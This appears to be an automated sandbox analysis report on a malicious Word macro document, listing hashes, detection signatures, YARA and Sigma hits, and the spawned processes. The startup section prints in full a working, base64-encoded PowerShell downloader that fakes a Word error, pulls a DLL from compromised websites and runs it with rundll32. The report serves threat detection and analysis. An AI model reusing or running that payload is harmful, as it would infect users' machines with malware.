Loading ...

Play interactive tourEdit tour

Analysis Report v22Pc0qA.doc.part

Overview

General Information

Sample Name:v22Pc0qA.doc.part (renamed file extension from part to doc)
Analysis ID:347028
MD5:7a7d325948481b0557b035249bf5c96a
SHA1:0529727ffad8388fc94155d1652ca65189cda5df
SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919

Most interesting Screenshot:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2296 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1320 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1100 cmdline: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2110752047.00000000002D6000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1f10:$s1: POwersheLL
00000004.00000002.2111601657.0000000001C34000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1f30:$s1: POwersheLL

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
